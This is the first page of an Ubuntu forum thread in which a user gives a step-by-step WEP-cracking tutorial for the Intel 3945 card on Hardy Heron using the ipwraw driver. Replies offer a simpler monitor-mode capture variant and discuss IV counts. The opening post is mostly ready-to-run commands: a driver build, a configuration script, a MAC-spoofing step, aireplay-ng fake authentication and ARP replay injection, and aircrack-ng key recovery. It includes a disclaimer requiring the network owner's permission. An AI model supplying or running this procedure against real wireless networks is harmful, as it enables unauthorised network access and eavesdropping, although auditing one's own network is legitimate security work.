Page 1 of 3 123 LastLast
Results 1 to 10 of 28

Thread: WEP cracking under Hardy Heron, using ipwraw driver

  1. #1
    Join Date
    Jun 2007
    Location
    Mexico City
    Beans
    28
    Distro
    Ubuntu 8.04 Hardy Heron
    WEP Cracking under Hardy Heron using ipwraw driver
    FIRST READ IT:

    Quoting XAsmodeanX:
    There is nothing inherently wrong with penetration testing your own networks, and it is not illegal to possess or use any of the tools in my tutorial.
    Following the logic that some linux applications can be misused, and that they are made for linux, then linux can be misused. Of course, even though linux can be a powerful tool or a "weapon" in the hands of some, all linux discussion should not be removed simply because of the possibility of misuse.
    Providing people with the tools and knowledge to understand their own networks is a crucial step in the road to having better security. If you don't understand a problem, you can't give a solution. The more that people know and understand how the WEP encryption scheme is broken, the better they can protect themselves by using WPA or another standard that is more secure.
    DISCLAIMER:
    Citing another one, which I cannot remember:
    Note that you need formal permission from the owner of any wireless network you wish to audit. Under no circumstances must you compromise a network's security prior to obtaining approval from the owner of the network, and no support will be given to users who seek to do otherwise.
    NOTICE:

    Your computer may become unstable and even have a hard-lock [that it seems to be related to injection speed, it is more prone to crash with 54M speed than 1M speed] (you will need to do a hard reset on your machine, I can tell you from my own experience while trying to do this). I recommend to take enough measures to safe-guard your data just in case you have to reinstall your OS, and PLEASE DO NOT TRY THIS AT PRODUCTION MACHINES.

    Please note that I'm using the ipwraw, which now is deprecated since I was not able to find enough information on how to do packet injection under the new drivers.

    A not so long trip... - Starting:

    I am aware that there are many ways to accomplish WEP cracking, after you can perform injection, such as kismet, and others, but this is the way it worked for me since Gutsy Gibbon, but now I have managed to make it work for Hardy Heron.

    One main issue since the shipping of Intel PRO/Wireless 3945ABG WLAN (802.11a/b/g) was to make it even work with Linux. One effort (now deprecated) was the project hosted at http://ipw3945.sourceforge.net/ in which they offered a driver that in order to use you needed a binary microcode, a binary user space regulatory daemon, the ieee80211 subsystem, a linux kernel >= 2.6.13, wireless extensions and tools and a module WPA supplicant [this will not be covered in this walk-trough].

    Now that effort have been deprecated in favour of the iwlwifi drivers (you can read the history here: http://intellinuxwireless.org/?p=iwlwifi). As far as I am aware, they support the Intel PRO/Wireless 3945ABG WLAN (802.11a/b/g) out of the box.

    But...

    There is always a but. In order to support packet injection, the problems arised. Some distros (wifiway, if my memory is not so bad), and some websites (seguridadwireless.com, if my memory is not that bad) showed us how to patch the drivers, those steps have been ported to almost any linux distro. With the binary drivers (ipw3945), and using the ipwraw hosted at http://homepages.tu-darmstadt.de/~p_larbig/wlan/ you were able to perform packet injection.

    Well, if you used those drivers, [almost] all was OK. When I installed Ubuntu Hardy Heron, I was so happy that the ipw3945 have been gone and that the iwlwifi driver was on command now, until... I tried to test packet injection. No one thing worked. For almost a day or two (I cannot recall total time... ) I googled the WWW in order to find a possible solution. No luck, i just find nothing/nada [Did I have entered the correct google search terms? Perhaps]. I just stumbled with some useful pages, indeed. Some of them uncovered that puzzle a little, and finally I was enlightened... [just joking in the enlightenment part]. This is a not standard way... as you will see...

    The issue covering this walk-through, is to make under Hardy Heron the Intel 3945 chipset do packet injection, using the ipwraw driver provided by p_larbig, on a Hardy Heron. I'm working on various assumptions:

    • you have managed to patch ipw3945 drivers, previously
    • you own a linux machine with Hardy Heron freshly installed, I have neither the time or will to test on an upgraded system
    • you have managed to compile/install previous versions of the ipwraw driver
    • you know how to use aircrack-ng
    • you own a WEP (Weak Encryption Protocol, ) network
    • you can use CLI (ahhhhhhhh, linux, your CLI, a powerful tool and a headache)
    • the CAPITAL LETTERS in the cracking WEP key part act as placeholders for
      • CHANNEL, the channel which will be sniffed/injected
      • FILE, a file name
      • ESSID, the access point name such as WEIRDNET, INFINITAS, DREAMRYCHE
      • BSSID, the access point address
      • MACADDRESS, your wifi mac address
    • you are using it under your own risk
    • you know what the hell are you doing


    A not so long trip... - Hands on:
    You will need to type (or copy-past on CLI) the following
    Installing part:
    Code:
    sudo apt-get install linux-headers-`uname -r` build-essential libssl-dev macchanger 
    wget http://homepages.tu-darmstadt.de/~p_...022008.tar.bz2
    tar -xjf ipwraw-ng*
    cd ipwraw-ng
    make
    sudo make install
    sudo make install_ucode
    echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw
    sudo depmod -ae
    The non standard way:
    open gedit, copy and paste the following
    Code:
    #!/bin/bash
    
    clear
    echo "Please provide the wifi0 CHANNEL"
    read canal
    echo "Please provide the capture rate (best results with only 2)"
    read rate
    echo "Please provide the target BSSID"
    read bssid
    ifconfig wifi0 down
    chmod u+wrx /sys/class/net/wifi0/device/rate
    echo $rate >/sys/class/net/wifi0/device/rate
    echo $canal >/sys/class/net/wifi0/device/channel
    echo $bssid >/sys/class/net/wifi0/device/bssid
    ifconfig wifi0 up
    echo "Configuration completed. Ready to do packet injection"
    Save it under a wise name such as: wepcrackconf.sh or so and give it run permisision by issuing
    Code:
    sudo chmod +x wepcrackconf.sh
    Unloading/loading drivers:
    Code:
    sudo modprobe -r iwl3945
    sudo modprobe ipwraw
    Cracking part:
    open four terminals
    first terminal
    Code:
    sudo iwconfig wifi0 rate 1M
    sudo airodump-ng wifi0
    second terminal
    Code:
    sudo su
    ./wepcrackconf.sh
    • channel, pick the channel you wish
    • rate always 2
    • bssid, taken from previous terminal

    Code:
    exit
    sudo airodump-ng -c CHANNEL -w FILE wifi0
    third terminal
    Code:
    sudo macchanger -s wifi0
    sudo aireplay-ng -1 10 -e "ESSID" -a BSSID -h MACADDRESS wifi0
    fourth terminal
    Code:
    sudo aireplay-ng -3 -b BSSID -h MACADDRESS wifi0
    back on first terminal
    After you have gathered enough IV's stop command running with a Ctrl-C keystroke and issue
    Code:
    sudo aircrack-ng FILE.cap
    Unloading/loading drivers:
    Code:
    sudo modprobe -r ipwraw
    sudo modprobe iwl3945
    A not so long trip... - Comments:
    • the shell is now dash not bash, in the compiling part will complaint about it, but it seems to compile the ipwraw driver well
    • sudo make install, under the installing part seems to be aware of the firmware status (patched?/not patched?)
    • sudo make install_ucode, same as above
    • In the non standard way make sure that the quotes are CLI quotes (straight quotes), not typographical ones
    • In the non standard way I'm using the root powers to accomplish it. If you know another way to set the values, please let me know.
    • On the cracking part, fourth terminal
      • you probably get a message stating something as "20:45:20 wifi0 is on channel 13, but the AP uses channel 6", just reissue it
      • gather at least 500,000 packets, to crack a WEP 64-bit Hex (This is no longer the case since the new ptw attack (which is built into aircrack-ng, and used by your instructions) These days, anything between 20,000 and 50,000 packets will have success cracking 128 bit wep!) <- Thanks Noahod

    • you can change the MAC address just read the macchanger info or man page

    A not so long trip... - Troubleshooting:
    • echo "blacklist ipwraw" | sudo tee /etc/modprobe.d/ipwraw, seems not to be blacklisting ipwraw module, just check that are CLI quotes NOT typographical quotes, and issue the command again
    • If you cannot connect (after issuing all the commands or after a hard resent), just disable the ipw drivers and restart

    A not so long trip... - ACKs and references:
    In no particular order
    A not so long trip... - Misc:
    English is not my mother tongue, please be gentle with some grammatical errors. PM me and I will correct them ASAP.
    Based loosely on the XAsmodeanX tutorial (http://ubuntuforums.org/showthread.php?t=514723)
    A not so long trip... - Updates
    • There is a tool called wesside-ng which is in beta in the aircrack-ng suite. Performs all the operations required to crack a WEP key, but is quite IMHO unstable. It gave me 2 hard-locks in a row.
    • If you fail to reduce the capture rate the computer may crash... hard-learned by myself
    Last edited by qsr.nrwn; August 27th, 2008 at 04:52 PM. Reason: fixed some typos, updates and comments about speed, grammar corrections, updated download link

  2. #2
    Join Date
    Mar 2007
    Beans
    Hidden!

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    excellent post, kind of figured out myself recently, but is much of what i did, hope this works for everyone

  3. #3
    Join Date
    Jan 2008
    Location
    Mexico DF
    Beans
    3
    Distro
    Ubuntu 8.04 Hardy Heron

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    Eres un master, he vuelto a obtener los drivers ipwraw gracias a ti, una excelente solución rapida y facil.

  4. #4
    Join Date
    May 2008
    Beans
    2

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    Hi!
    Was great to find someone that's having the same problem as me, but decided to solve it.
    I also would like to ask you if you know that this should works with airoway script.

  5. #5
    Join Date
    Dec 2005
    Beans
    136

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    Thanks for the info, I have one of the new intel wireless N cards, and this helped me use aircrack. However, my process was much simpler, as the default driver in 8.04 supports monitor mode. Here's what I did, effectively:

    Code:
    sudo apt-get install aircrack-ng
    sudo killall NetworkManager        # causes issues if you leave it running
    sudo iwconfig wlan0 mode Monitor
    sudo airodump-ng -w dumpfile wlan0
    In a second terminal:

    Code:
    sudo aircrack-ng dumpfile-01.cap
    You can leave both programs running simultaneously, and aircrack will keep trying again and again as you gather more IVs until it cracks the key. This method means you just set it up and wait for the packets to fly.

    Again, thanks for the tips, I couldn't have figured this out without this post. I figured my experience was worth sharing.

  6. #6
    Join Date
    Jun 2007
    Location
    Mexico City
    Beans
    28
    Distro
    Ubuntu 8.04 Hardy Heron

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    Quote Originally Posted by DarioA View Post
    Hi!
    I also would like to ask you if you know that this should works with airoway script.
    To which airoway script (there are lurking some on the internet) are you refering? Please post a link to the page [first guess: wifiway? http://foro.seguridadwireless.net/in...c,4093.0.html] that host that script and let me try it to give you further advise, about its drawbacks [if any] and about the configuration.
    Entia non sunt multiplicanda praeter necessitatem
    Ockham's Razor
    v4sw6+9BCSUhw4+6ln5/6pr6Fck45ma7u7+9Lw2DVWXm0l6+9DLUViOscitee8$t3b9ADM ORSTen7+9a28s8Mr2g0 hackerkey.com

  7. #7
    Join Date
    Jun 2007
    Location
    Mexico City
    Beans
    28
    Distro
    Ubuntu 8.04 Hardy Heron

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    Quote Originally Posted by cracker View Post
    You can leave both programs running simultaneously, and aircrack will keep trying again and again as you gather more IVs until it cracks the key. This method means you just set it up and wait for the packets to fly.
    Leaving card in monitor mode, on your method, is quite useful only when you want to passively record all the packets but gathering all the needed packets can be a loooooooong process unless you are planning to use aircrack-ptw and wesside-ng approach, and as is stated in http://wiki-files.aircrack-ng.org/do...fin.slides.pdf, 21st slide, the numbers are as high as 100,000 to crack a 64 Hex-bit key.

    I tried your suggestion, and it collected about ~50 data packets in 16 minutes. With injection, you can collect about 500,000 in the same time. The whole point to inject traffic on the network is to speed up the process, so this is the reason the ipwraw driver is needed, to send raw packets as is described in http://www.security-freak.net/packet...injection.html
    Entia non sunt multiplicanda praeter necessitatem
    Ockham's Razor
    v4sw6+9BCSUhw4+6ln5/6pr6Fck45ma7u7+9Lw2DVWXm0l6+9DLUViOscitee8$t3b9ADM ORSTen7+9a28s8Mr2g0 hackerkey.com

  8. #8
    Join Date
    Dec 2005
    Beans
    136

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    I see what you mean. However, it doesn't really take that long if there's a client on the network. I cracked my own key with only 20,000 IVs, and with only one client on the network, surfing the web, it took less than fifteen minutes. Though, I can see how generating your own traffic would speed up the process, especially if there aren't any clients using the network.

  9. #9
    Join Date
    May 2008
    Beans
    30

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    Hi,
    Im rather new to this so forgive more the newbie question.

    I have been playing around with aircrack with no success only to realise that my driver is the ipw3945. The ipwraw is a great solution for use with this as i understand aircrack does not support 3945. Im a bit slow because it took me ages to realise this .

    I have done everything down to the crack part.

    I have a question about placeholders. Where do i get the information for channel and the macaddress (correct me if im wrong but is that through the iwconfig command?), also as regards to the file name, can this be of my choice? and does the file be saved, if so is there a good directory it can go or does it go in the /ipwraw directory.

    thanks.

  10. #10

    Re: WEP cracking under Hardy Heron, using ipwraw driver

    1st off, great post, good work on getting it done,ipwraw driver has only one side effect, to get the best on it u must set ur network manger(ie: manual network configuration) in manual config and set it to roaming mode.

    Once u do that follow this post and ur skyling.

    once again good work

    cheer all

Page 1 of 3 123 LastLast

Tags for this Thread

Bookmarks

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts
  •